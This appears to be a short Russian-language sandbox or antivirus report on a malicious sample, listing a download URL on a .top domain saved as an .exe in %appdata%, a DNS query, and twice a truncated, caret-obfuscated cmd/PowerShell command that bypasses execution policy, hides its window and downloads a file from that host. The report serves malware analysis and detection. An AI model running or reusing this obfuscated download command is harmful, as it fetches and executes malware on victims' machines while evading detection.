Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWe^Rs^Hel^l.^ExE -execU^TI^ON^P^oL^i^cY By^pA^ss^ -N^oPRo^FilE^ ^-^W^I^NdO^WS^TyLE^ HiDDeN ^(NEw^-O^Bjec^t sYs^T^Em.n^Et^.w^EBcL^Ie^N^T^).^DOw^NL^OAdfi^lE(^'http://mondayhelt...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "poWe^Rs^Hel^l.^ExE -execU^TI^ON^P^oL^i^cY By^pA^ss^ -N^oPRo^FilE^ ^-^W^I^NdO^WS^TyLE^ HiDDeN ^(NEw^-O^Bjec^t sYs^T^Em.n^Et^.w^EBcL^Ie^N^T^).^DOw^NL^OAdfi^lE(^'http://mondayhelt...' (со скрытым окном)